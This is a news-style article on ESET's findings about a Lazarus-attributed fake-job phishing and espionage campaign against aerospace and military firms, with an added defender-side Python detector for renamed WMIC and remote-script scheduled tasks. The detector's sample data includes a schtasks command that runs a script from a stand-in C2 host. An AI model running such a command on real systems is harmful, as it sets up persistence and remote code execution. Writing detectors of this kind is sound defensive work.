Targeted Cyber-Espionage Campaign Hits Aerospace and Military Sectors
Cybersecurity researchers have unveiled a sophisticated cyber-espionage campaign that specifically targets aerospace and military organizations across Europe and the Middle East. This initiative, termed “Operation In(ter)ception,” reportedly aimed to infiltrate and monitor key personnel within these firms while also attempting to extract financial gains through deceptive tactics.
According to a recent report by ESET, a cybersecurity firm, this campaign unfolded between September and December 2019, employing sophisticated malware techniques. The main objective, as articulated by ESET researchers, was espionage. However, in certain instances, attackers went a step further, aiming to monetize their access via Business Email Compromise (BEC) attacks, attempting to redirect funds from victim companies to accounts controlled by the intruders.
The modus operandi of the attackers involved employing social engineering tactics to lure employees from targeted organizations with fake job offers. Using LinkedIn’s messaging feature, they posed as HR representatives from reputable aerospace and defense enterprises, such as Collins Aerospace and General Dynamics. Once contact was established, malicious files disguised as job-related documents were introduced into communications.
These deceptive files, often encapsulated within RAR archives sent directly through messages or emails from impersonated LinkedIn accounts, were advertised as containing essential information—such as salary details—related to the purported job openings. In reality, these files executed a sequence of commands through Windows’ Command Prompt, which included copying the Windows Management Instrumentation command-line tool to obscure locations, renaming it to evade detection, and creating scheduled tasks for executing remote scripts.
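A defender-side illustration of the two tricks described above, added here and not part of ESET’s report: a small Python checker run over constructed Sysmon process-creation records that flags a WMIC binary whose PE original filename no longer matches its on-disk name or location, and a schtasks /create whose task action references a remote URL. The sample events, paths and command lines are assumptions made for this example.

```python
import re
from pathlib import PureWindowsPath

# Legitimate homes of the WMI command-line tool on a 64-bit Windows install (assumed).
WMIC_DIRS = {r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed Sysmon Event ID 1 (process creation) records for this example; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},
    {"Image": r"C:\Users\Public\Libraries\intel.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "intel.exe os get caption"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 30 /tn Updater '
                    r'/tr "C:\Users\Public\Libraries\intel.exe http://c2.example.invalid/script"'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc daily /tn Backup /tr "C:\Tools\backup.exe"'},
]


def check_event(event: dict) -> list[str]:
    """Return the names of the detections that fire for one process-creation event."""
    hits = []
    image = PureWindowsPath(event.get("Image", ""))
    name = image.name.lower()
    parent_dir = str(image.parent).lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    # Copied/renamed WMIC: the PE version resource still reports wmic.exe even after
    # the binary has been copied to another directory and given a new name.
    if original == "wmic.exe" and (name != "wmic.exe" or parent_dir not in WMIC_DIRS):
        hits.append("wmic_renamed_or_relocated")
    # Scheduled task creation whose action contains a URL, i.e. a remote script.
    if name == "schtasks.exe" and "/create" in cmdline.lower() and REMOTE_URL.search(cmdline):
        hits.append("schtasks_remote_script")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run check_event over a batch and return (event_index, detection_name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in check_event(ev)]


if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {hit} -> {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Only the second and third constructed events fire; the legitimate WMIC run and the local backup task do not.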
Upon gaining initial access to the targeted companies, the attackers deployed a custom malware downloader that fetched a more advanced payload—a C++ backdoor capable of receiving commands from an attacker-controlled server. This backdoor could execute predefined actions and exfiltrate the gathered information in a compressed RAR format.
ESET’s investigation into this campaign raised suspicions about the involvement of the Lazarus Group, a well-known hacking entity believed to operate on behalf of the North Korean government. The group has a long-standing history of cyber-attacks aimed at funding the country’s prohibited weapons and missile projects. Mapped to the MITRE ATT&CK framework, the tactics may have included initial access through phishing and the use of the deployed malware as a persistence mechanism.
In addition to data exfiltration, evidence suggested that some attackers sought financial gain by exploiting compromised email accounts to manipulate business transactions. They registered deceptive domains similar to those of compromised firms, directing fraudulent communications to customers in an attempt to redirect payments to accounts under their control. However, their efforts were thwarted when one targeted customer noticed the anomalies and contacted the victim company.
This incident underscores the ongoing threat posed by advanced phishing tactics and the essential need for heightened vigilance within the aerospace and military sectors. The methodologies employed were not only technically sophisticated but also relied heavily on social engineering, re-emphasizing the critical role human error plays in cybersecurity vulnerabilities.
ESET’s findings serve as a stark reminder for business owners to remain vigilant against such engineered threats, ensuring employees are trained to recognize and report suspicious communications. As cyber threats evolve, so too must the strategies employed to mitigate these risks.